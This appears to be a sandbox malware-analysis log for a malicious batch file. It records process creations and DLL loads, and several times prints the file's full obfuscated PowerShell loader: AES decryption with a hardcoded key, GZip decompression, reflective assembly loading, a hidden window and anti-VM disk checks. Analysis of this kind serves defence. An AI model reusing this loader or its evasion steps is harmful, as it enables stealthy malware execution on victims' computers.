'$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\winlogon.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Users\user\Desktop\NhoqAfkhHL.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{a30b26c3-fc52-4130-ba13-513d17912584}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\Desktop\NhoqAfkhHL.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function PChco($juOOu){ $nHZjS=[System.Security.Cryptography.Aes]::Create(); $nHZjS.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nHZjS.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nHZjS.Key=[System.Convert]::FromBase64String('yR7wF+Ofc2fLpXZpHqhjqpLkvTMSNK6OFotDyrTmTgI='); $nHZjS.IV=[System.Convert]::FromBase64String('yXVdOaRolG4gnbUzIyqL8w=='); $ifjSd=$nHZjS.CreateDecryptor(); $kfQiQ=$ifjSd.TransformFinalBlock($juOOu, 0, $juOOu.Length); $ifjSd.Dispose(); $nHZjS.Dispose(); $kfQiQ;}function QsuOu($juOOu){ Invoke-Expression '$FPPmA=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$juOOu);'.Replace('*', ''); Invoke-Expression '$JwqOr=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$zXHyN=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($FPPmA, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $zXHyN.CopyTo($JwqOr); $zXHyN.Dispose(); $FPPmA.Dispose(); $JwqOr.Dispose(); $JwqOr.ToArray();}function ncxgW($juOOu,$DoZwZ){ Invoke-Expression '$tPEQt=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$juOOu);'.Replace('*', ''); Invoke-Expression '$CmubR=$tPEQt.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$CmubR.*I*n*v*o*k*e*($null, $DoZwZ);'.Replace('*', '');}$TYRmI = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $TYRmI;$ZUcIA=[System.IO.File]::ReadAllText($TYRmI).Split([Environment]::NewLine);foreach ($gNOPj in $ZUcIA) { if ($gNOPj.StartsWith('HVGSF')) { $AqOVs=$gNOPj.Substring(5); break; }}$sLTIt=[string[]]$AqOVs.Split('\');Invoke-Expression '$daZ = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$ETi = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$gpc = QsuOu (PChco ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($sLTIt[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');ncxgW $daZ $null;ncxgW $ETi $null;ncxgW $gpc (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{239b6a72-1bca-4ef7-9072-2b3f0dd0b0f5}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\dllhost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\winlogon.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\lsass.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
